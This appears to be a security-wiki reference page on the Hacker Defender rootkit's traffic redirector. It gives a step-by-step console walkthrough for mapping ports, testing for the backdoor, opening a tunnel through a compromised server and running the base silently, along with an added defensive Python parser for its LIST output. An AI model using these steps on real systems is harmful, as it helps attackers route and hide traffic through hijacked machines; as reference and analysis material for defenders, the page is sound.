Hacker-Defender-hxdef/rdrbs100-redirector

From aldeid

Description

The redirector is built on the backdoor mechanism. The first packets of a connection are identical to those of a backdoor connection, so the redirector uses the same ports as the backdoor. The packets that follow are special packets used only by the redirector; they are produced by the redirector base, which runs on the user's computer. The first packet of a redirected connection defines the target server and port.

The redirector base saves its settings in an ini file whose name is derived from the base executable's name (so the default is rdrbs100.ini). If this file does not exist when the base is started, it is created automatically. It is better not to edit this ini file externally; all settings can be changed from the base console.

To use the redirector on a server where the rootkit is installed, the redirector base must first be run on localhost. Then, in the base console, a mapped port routed to the server running hxdef is created. Finally, we connect to the base on localhost on the chosen port and transfer data. Redirected data are encoded with the rootkit password. In this version the connection speed is limited to about 256 kBps; the redirector is not intended for high-speed connections in this version. The redirector is also limited by the system on which the rootkit runs. The redirector works with the TCP protocol only.

In this version the base is controlled with 19 commands. They are not case sensitive, and their functions are described by the HELP command. During base startup, the commands in the startup-list are executed. The startup-list is edited with the commands whose names start with SU.

The redirector distinguishes two connection types, HTTP and other. For connections of the other type, packets are not modified. For HTTP connections, the Host parameter in the HTTP header is rewritten to the target server. The maximum number of redirectors on one base is 1000.

The redirector base works fully only on NT systems. Only on NT does the program have a tray icon and allow the console to be hidden with the HIDE command, and only on NT can the base be run in silent mode, in which it produces no output, shows no icon, and executes only the commands in the startup-list.

Examples

Getting mapped port info

>MPINFO

No mapped ports in the list.

Add the MPINFO command to the startup-list and list the startup-list commands

>SUADD MPINFO
>sulist
0) MPINFO

Using the HELP command

>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL, 
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET 
SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]

Add a mapped port

We want to listen on localhost on port 100; the rootkit is installed on server 200.100.2.36 on port 80; the target server is www.google.com on port 80; the rootkit password is bIgpWd; the connection type is HTTP; and the IP address of the target server (www.google.com), which we always have to know, is 216.239.53.100:

>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

The ADD command can also be run without parameters; in that case we are prompted for each parameter separately.

Check the mapped ports again with MPINFO

>MPINFO

There are 1 mapped ports in the list. Currently 0 of them open.

Enumeration of the mapped port list

>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

Detailed description of one mapped port

>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
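The LIST line and the DETAIL block above are the only record of a mapped port an analyst gets from the base console. As an added example (not part of the rootkit package or this page), the following Python parses LIST output in the layout shown above into structured records, validates the port fields, and derives the endpoints the base host will connect to, which is what a defender would look for in network logs; the sample lines are constructed, and the label used for the non-HTTP type is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed sample of rdrbs100 LIST output in the layout shown on the page:
# "NNN) " followed by colon-separated fields. The field directly after ')' is
# empty in the page's output and its meaning is not documented, so it is ignored.
# "OTHER" as the label of the non-HTTP type is an assumption.
SAMPLE_LIST = """\
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
001) :8443:10.0.0.5:443:192.0.2.10:443:s3cret:OTHER
"""

LINE_RE = re.compile(
    r"^(\d{3})\) [^:]*:(\d+):([^:]+):(\d+):([^:]+):(\d+):([^:]*):(\S+)$"
)


@dataclass
class MappedPort:
    index: int
    local_port: int        # port the base listens on (localhost)
    mapping_server: str    # host where hxdef is installed
    mapping_port: int      # backdoor port on that host
    target_server: str     # final destination (an IP address, per the page)
    target_port: int
    password: str          # rootkit password used to encode the traffic
    port_type: str         # HTTP (Host header rewritten) or other


def _port(value):
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {value}")
    return port


def parse_list_output(text):
    """Parse LIST console output into MappedPort records, validating ports."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised LIST line: {line!r}")
        records.append(MappedPort(int(m[1]), _port(m[2]), m[3], _port(m[4]),
                                  m[5], _port(m[6]), m[7], m[8].upper()))
    return records


def outbound_endpoints(records):
    """Endpoints the base host connects to, i.e. the hosts running hxdef."""
    return {f"{r.mapping_server}:{r.mapping_port}" for r in records}
```

Note that the LIST line carries no domain field; the HTTP Host value is only visible in DETAIL output.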

Test whether the rootkit is installed

We can test whether the rootkit is installed without password on mapping server 200.100.2.36 (but this is not needed if we are sure about it):

>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK

If the test fails, it returns:

Testing 0) 200.100.2.36:80:bIgpWd - FAILED

OPEN command

The port is still closed; before we can use it, we have to open it with the OPEN command. An open port can be closed with the CLOSE command. The ALL flag applies either command to all ports in the list. The current state after the requested action is printed after a short while:

>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.

or

>OPEN ALL
Port number 0 opened.

Save current settings

To save the current settings and lists we use the SAVE command, which writes everything to the ini file (saving is also done by the EXIT command without the DIS flag):

>SAVE
Saved successfully.

An open port is all we need for data transfer. Now you can open your favourite browser and enter http://localhost:100/ as the URL. If there are no problems, you will see the main page of www.google.com load.

The first packets of a connection can be delayed by up to 5 seconds, but the rest are limited only by the speed of the server, your internet connection speed, and the redirector technology itself, which is about 256 kBps in this version.
